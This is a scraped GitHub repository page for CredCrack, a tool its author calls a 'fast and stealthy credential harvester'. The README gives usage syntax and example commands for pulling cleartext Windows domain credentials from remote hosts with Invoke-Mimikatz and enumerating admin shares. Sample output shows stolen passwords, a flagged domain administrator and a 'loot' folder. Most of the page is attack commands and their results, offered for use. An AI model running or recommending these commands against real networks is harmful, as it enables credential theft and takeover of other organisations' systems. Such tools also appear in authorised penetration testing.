A fast and stealthy credential harvester
Switch branches/tags
Nothing to show
Clone or download
gojhonny Merge pull request #17 from bryant1410/master
Fix broken headings in Markdown files
Latest commit 574171f Apr 18, 2017
Failed to load latest commit information.
LICENSE initial commit Jul 24, 2015
README.md Fix broken Markdown headings Apr 18, 2017
credcrack.py version update Aug 27, 2015




CredCrack is a fast and stealthy credential harvester. It exfiltrates credentials recusively in memory and in the clear. Upon completion, CredCrack will parse and output the credentials while identifying any domain administrators obtained. CredCrack also comes with the ability to list and enumerate share access and yes, it is threaded!

CredCrack has been tested and runs with the tools found natively in Kali Linux. CredCrack solely relies on having PowerSploit's "Invoke-Mimikatz.ps1" under the /var/www directory. Download Invoke-Mimikatz Here


usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es]
                    [-l LHOST] [-t THREADS]

CredCrack - A stealthy credential harvester by Jonathan Broche (@g0jhonny)

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  File containing IPs to harvest creds from. One IP per
  -r RHOST, --rhost RHOST
                        Remote host IP to harvest creds from.
  -es, --enumshares     Examine share access on the remote IP(s)
  -l LHOST, --lhost LHOST
                        Local host IP to launch scans from.
  -t THREADS, --threads THREADS
                        Number of threads (default: 10)

  -d DOMAIN, --domain DOMAIN
                        Domain or Workstation
  -u USER, --user USER  Domain username


./credcrack.py -d acme -u bob -f hosts -es
./credcrack.py -d acme -u bob -f hosts -l -t 20


Enumerating Share Access

./credcrack.py -r -d acme -u bob --es
  CredCrack v1.1 by Jonathan Broche (@g0jhonny)
[*] Validating
[*] Validating
[*] Validating

 ----------------------------------------------------------------- - Windows 7 Professional 7601 Service Pack 1 
 OPEN      \\\ADMIN$ 
 OPEN      \\\C$ 

 ----------------------------------------------------------------- - Windows Vista (TM) Ultimate 6002 Service Pack 2 
 OPEN      \\\ADMIN$ 
 OPEN      \\\C$ 
 CLOSED    \\\F$ 

 ----------------------------------------------------------------- - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 
 CLOSED    \\\C$ 
 OPEN      \\\SYSVOL 

[*] Done! Completed in 0.8s

Harvesting credentials

./credcrack.py -f hosts -d acme -u bob -l

  CredCrack v1.1 by Jonathan Broche (@g0jhonny)
[*] Setting up the stage
[*] Validating
[*] Validating
[*] Querying domain admin group from
[*] Harvesting credentials from
[*] Harvesting credentials from

                  The loot has arrived...
                       | /         /    
                       `. ())oo() .      
                       %| |-%-------|       
                      % \ | %  ))   |       
                      %  \|%________|       

[*] Host: Domain: ACME User: jsmith Password: Good0ljm1th
[*] Host: Domain: ACME User: daguy Password: P@ssw0rd1!

     1 domain administrators found and highlighted in yellow above!

[*] Cleaning up
[*] Done! Loot may be found under /root/CCloot folder
[*] Completed in 11.3s


Contact me at @g0jhonny with any questions or features you'd like to see in the next update. For bugs submit an issue!


CredCrack couldn't have been possible without the contributions of the following individuals. You're all rockstars! @JosephBialek, @brav0hax, @altonjx and everyone else! Thank you for all your contributions and feedback to make this a better script, keep 'em coming!